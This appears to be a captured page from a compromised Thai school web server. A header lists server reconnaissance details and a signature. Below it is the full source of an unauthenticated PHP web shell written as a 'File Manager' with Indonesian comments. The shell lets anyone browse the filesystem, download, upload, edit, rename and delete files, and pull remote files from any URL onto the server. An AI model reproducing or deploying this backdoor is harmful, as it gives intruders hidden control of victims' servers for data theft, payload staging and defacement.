| Server IP : 27.254.66.5 / Your IP : 216.73.217.39 Web Server : Apache/2 System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64 User : technic2 ( 1951) PHP Version : 7.4.30 Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/technic2/domains/technicrayong.ac.th/private_html/teacher/ |
Upload File : |
� trio@ngefly �!
<?php
// filemanager.php
error_reporting(E_ALL);
ini_set('display_errors', 1);
// ------------ Util & init -------------
function safeRealpath($p) {
$r = realpath($p);
if ($r === false) {
// fallback: normalisasi path
$r = rtrim(str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $p), DIRECTORY_SEPARATOR);
}
return $r;
}
// Tentukan directory saat ini (GET 'dir' atau default getcwd)
$requested = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
$currentDir = safeRealpath($requested);
if ($currentDir === false) $currentDir = getcwd();
// ---------------- DOWNLOAD LOKAL ----------------
if (isset($_GET['download'])) {
$downloadPath = safeRealpath($_GET['download']);
if ($downloadPath && is_file($downloadPath) && is_readable($downloadPath)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($downloadPath) . '"');
header('Content-Length: ' . filesize($downloadPath));
readfile($downloadPath);
exit;
} else {
echo "File tidak ditemukan atau tidak dapat dibaca.";
exit;
}
}
// ---------------- Actions ----------------
function redirectTo($dir) {
header("Location: ?dir=" . urlencode($dir));
exit;
}
// ---------------- UPLOAD LOKAL ----------------
$uploadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) {
$postDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
if ($postDir && is_file($postDir)) $postDir = dirname($postDir);
$targetDir = ($postDir && is_dir($postDir)) ? $postDir : getcwd();
$f = $_FILES['upload'];
if ($f['error'] !== UPLOAD_ERR_OK) {
$uploadMessage = "Upload error (code {$f['error']}).";
} elseif (!is_uploaded_file($f['tmp_name'])) {
$uploadMessage = "File upload tidak valid (bukan dari HTTP POST).";
} elseif (!is_writable($targetDir)) {
$uploadMessage = "Folder tujuan tidak writable: " . htmlspecialchars($targetDir);
} else {
$orig = basename($f['name']);
$safe = preg_replace('/[^A-Za-z0-9._-]/', '_', $orig);
if ($safe === '' || $safe === '.' || $safe === '..') {
$uploadMessage = "Nama file tidak valid.";
} else {
$targetPath = $targetDir . DIRECTORY_SEPARATOR . $safe;
$in = @fopen($f['tmp_name'], 'rb');
$out = @fopen($targetPath, 'wb');
if ($in && $out) {
$bytes = stream_copy_to_stream($in, $out);
fclose($in);
fclose($out);
if ($bytes !== false) {
@chmod($targetPath, 0644);
$uploadMessage = "✅ File dibuat & diisi: " . htmlspecialchars($safe)
. "<br>Lokasi: " . htmlspecialchars($targetDir)
. "<br>Ukuran tersalin: " . number_format($bytes) . " byte"
. "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
} else {
@unlink($targetPath);
$uploadMessage = "❌ Gagal menyalin isi file ke: " . htmlspecialchars($targetPath);
}
} else {
if ($in) fclose($in);
if ($out) fclose($out);
$uploadMessage = "❌ Tidak bisa membuka stream baca/tulis. Periksa permission folder.";
}
}
}
}
// ---------------- DOWNLOAD DARI URL ----------------
$downloadMessage = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['download_url'])) {
$currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : getcwd();
$url = trim($_POST['download_url']);
if (filter_var($url, FILTER_VALIDATE_URL)) {
$filename = basename(parse_url($url, PHP_URL_PATH));
$filename = preg_replace('/[^A-Za-z0-9._-]/', '_', $filename);
if ($filename === '' || $filename === '.' || $filename === '..') $filename = 'downloaded_file';
$targetPath = $currentDir . DIRECTORY_SEPARATOR . $filename;
// Download file dengan stream
$in = @fopen($url, 'rb');
$out = @fopen($targetPath, 'wb');
if ($in && $out) {
$bytes = stream_copy_to_stream($in, $out);
fclose($in);
fclose($out);
if ($bytes !== false) {
@chmod($targetPath, 0644);
$downloadMessage = "✅ File dari URL berhasil didownload: <strong>" . htmlspecialchars($filename) . "</strong>
<br>Lokasi: " . htmlspecialchars($currentDir)
. "<br><a href='?download=" . rawurlencode($targetPath) . "' target='_blank'>⬇️ Download</a>";
} else {
@unlink($targetPath);
$downloadMessage = "❌ Gagal menulis file dari URL.";
}
} else {
if ($in) fclose($in);
if ($out) fclose($out);
$downloadMessage = "❌ Tidak bisa membuka URL atau folder tujuan.";
}
} else {
$downloadMessage = "❌ URL tidak valid.";
}
}
// ---------------- DELETE ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete'])) {
$currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
$target = safeRealpath($_POST['delete']);
if ($target && strpos($target, DIRECTORY_SEPARATOR) !== false) {
if (is_dir($target)) @rmdir($target); else @unlink($target);
}
redirectTo($currentDir);
}
// ---------------- RENAME ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['rename_path'], $_POST['new_name'])) {
$currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
$old = safeRealpath($_POST['rename_path']);
$newName = basename($_POST['new_name']);
if ($old && file_exists($old)) {
$newPath = dirname($old) . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $newName);
@rename($old, $newPath);
}
redirectTo($currentDir);
}
// ---------------- EDIT / SAVE ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_path']) && !isset($_POST['save_content'])) {
$currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
$editPath = safeRealpath($_POST['edit_path']);
if ($editPath && is_file($editPath) && is_readable($editPath)) {
$content = htmlspecialchars(file_get_contents($editPath));
echo "<h3>Editing: " . htmlspecialchars($editPath) . "</h3>
<form method='post'>
<input type='hidden' name='save_path' value='" . htmlspecialchars($editPath) . "'>
<input type='hidden' name='current_dir' value='" . htmlspecialchars($currentDir) . "'>
<textarea name='content' rows='20' cols='100'>{$content}</textarea><br>
<button type='submit' name='save_content'>Simpan</button>
</form>";
exit;
} else {
redirectTo($currentDir);
}
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_content'], $_POST['save_path'])) {
$savePath = safeRealpath($_POST['save_path']);
if ($savePath && is_file($savePath) && is_writable($savePath)) {
file_put_contents($savePath, $_POST['content']);
}
$currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
redirectTo($currentDir);
}
// ---------------- CREATE FILE / FOLDER ----------------
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_file'])) {
$currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
$name = basename($_POST['new_file']);
file_put_contents($currentDir . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $name), '');
redirectTo($currentDir);
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_folder'])) {
$currentDir = isset($_POST['current_dir']) ? safeRealpath($_POST['current_dir']) : $currentDir;
$name = basename($_POST['new_folder']);
@mkdir($currentDir . DIRECTORY_SEPARATOR . preg_replace('/[^A-Za-z0-9._-]/', '_', $name));
redirectTo($currentDir);
}
// ---------------- LISTING ----------------
function buildBreadcrumb($dir) {
$parts = preg_split('#[\\/\\\\]#', $dir, -1, PREG_SPLIT_NO_EMPTY);
$acc = (DIRECTORY_SEPARATOR === '/') ? '' : '';
$crumbs = [];
$prefix = DIRECTORY_SEPARATOR;
$pathParts = [];
if (DIRECTORY_SEPARATOR === '/' && substr($dir,0,1) === '/') $acc = DIRECTORY_SEPARATOR;
foreach ($parts as $p) {
$acc .= ($acc === DIRECTORY_SEPARATOR || $acc === '' ? $p : DIRECTORY_SEPARATOR . $p);
$pathParts[] = $acc;
}
if (empty($pathParts)) return "<a href='?dir=" . urlencode(DIRECTORY_SEPARATOR) . "'>/</a>";
$out = [];
foreach ($pathParts as $pp) {
$out[] = "<a href='?dir=" . urlencode($pp) . "'>" . htmlspecialchars(basename($pp) ?: $pp) . "</a>";
}
return implode(" / ", $out);
}
function listFilesAndDirs($dir) {
$items = @scandir($dir);
if ($items === false) {
echo "<tr><td colspan='5'>Tidak dapat membaca direktori ini.</td></tr>";
return;
}
foreach ($items as $item) {
if ($item === '.') continue;
if ($item === '..') {
$parent = dirname($dir);
echo "<tr><td>📁</td><td><a href='?dir=" . urlencode($parent) . "'>.. (Parent)</a></td><td>-</td><td>-</td><td>-</td></tr>";
continue;
}
$path = $dir . DIRECTORY_SEPARATOR . $item;
$type = is_dir($path) ? 'Folder' : 'File';
$size = is_file($path) ? filesize($path) : '-';
$time = file_exists($path) ? date("Y-m-d H:i:s", filemtime($path)) : '-';
echo "<tr>
<td>" . ($type === 'Folder' ? '📁' : '📄') . "</td>
<td>" . ($type==='Folder'? "<a href='?dir=" . urlencode($path) . "'>" . htmlspecialchars($item) . "</a>" : htmlspecialchars($item)) . "</td>
<td>" . htmlspecialchars($size) . "</td>
<td>" . htmlspecialchars($time) . "</td>
<td>
<form method='post' style='display:inline'>
<input type='hidden' name='delete' value='" . htmlspecialchars($path) . "'>
<input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
<button onclick='return confirm(\"Yakin hapus?\")'>🗑</button>
</form>
<form method='post' style='display:inline'>
<input type='hidden' name='rename_path' value='" . htmlspecialchars($path) . "'>
<input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
<input type='text' name='new_name' placeholder='Nama baru' required>
<button>✏️</button>
</form>";
if ($type === 'File') {
echo " <a href='?download=" . urlencode($path) . "'>⬇️ Download</a>
<form method='post' style='display:inline'>
<input type='hidden' name='edit_path' value='" . htmlspecialchars($path) . "'>
<input type='hidden' name='current_dir' value='" . htmlspecialchars($dir) . "'>
<button>📝 Edit</button>
</form>";
}
echo "</td></tr>";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>File Manager</title>
<style>
body { font-family: Arial, sans-serif; padding:16px; background:#f7f7f7; }
table { width:100%; background:#fff; border-collapse:collapse; }
th, td { padding:8px; border:1px solid #e1e1e1; }
form { margin:0; display:inline; }
input[type="text"], input[type="url"] { padding:4px; }
</style>
</head>
<body>
<h2>File Manager</h2>
<p><strong>Lokasi saat ini:</strong> <?= buildBreadcrumb($currentDir) ?></p>
<?php if ($uploadMessage): ?>
<div style="padding:8px; background:#efe; border:1px solid #cfc; margin-bottom:8px;"><?= $uploadMessage ?></div>
<?php endif; ?>
<?php if ($downloadMessage): ?>
<div style="padding:8px; background:#eef; border:1px solid #ccf; margin-bottom:8px;"><?= $downloadMessage ?></div>
<?php endif; ?>
<!-- Upload File Lokal -->
<form method="post" enctype="multipart/form-data" style="margin-bottom:8px;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="file" name="upload" required>
<button>⬆ Upload</button>
</form>
<!-- Download File dari URL -->
<form method="post" style="margin-bottom:8px;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="url" name="download_url" placeholder="Masukkan URL file" required style="width:300px;">
<button>🌐 Download dari URL</button>
</form>
<!-- Buat File / Folder -->
<form method="post" style="display:inline; margin-right:8px;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="text" name="new_file" placeholder="Nama file baru">
<button>📄 Buat File</button>
</form>
<form method="post" style="display:inline;">
<input type="hidden" name="current_dir" value="<?= htmlspecialchars($currentDir) ?>">
<input type="text" name="new_folder" placeholder="Nama folder baru">
<button>📁 Buat Folder</button>
</form>
<table style="margin-top:12px;">
<thead><tr><th>Type</th><th>Nama</th><th>Ukuran</th><th>Waktu</th><th>Aksi</th></tr></thead>
<tbody>
<?php listFilesAndDirs($currentDir); ?>
</tbody>
</table>
</body>
</html>